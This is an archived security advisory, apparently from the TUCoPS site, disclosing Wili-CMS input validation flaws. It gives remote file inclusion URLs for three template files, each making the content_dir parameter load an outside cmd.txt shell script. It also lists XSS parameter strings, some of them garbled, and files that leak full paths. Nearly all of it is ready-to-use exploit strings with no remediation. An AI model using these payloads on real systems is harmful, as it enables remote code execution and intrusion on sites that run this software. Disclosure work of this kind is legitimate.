TUCoPS :: Web :: CMS / Portals :: b06-4832.htm

Wili-CMS Multiple Input Validation Vulnerabilities
Wili-CMS Multiple Input Validation Vulnerabilities
Wili-CMS Multiple Input Validation Vulnerabilities



Hello,,=0D
=0D
Wili-CMS Multiple Input Validation Vulnerabilities=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
Remote include=0D
=0D
example-view/templates/article.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?=0D 
example-view/templates/root.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?=0D 
example-view/templates/dates_list.php?globals[content_dir]=http://psevil.googlepages.com/cmd.txt?=0D 
=0D
Xss=0D
http://localhost/vul/wili-cms/relocate.php?=0D 
=0D">http://localhost/vul/wili-cms/example-view/inc/print_button.php?globals[pageid]=">=0D 
=0D
Full path=0D
thumbnail.php?filename=global_variables.php=0D
functions/admin/all.php=0D
functions/admin/init_session.php=0D
functions/all.php=0D
example-view/admin_templates/ any_file.php=0D
=0D
and many other Xss and Full path vulnerabilities=0D
=0D
#WwW.SoQoR.NeT 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH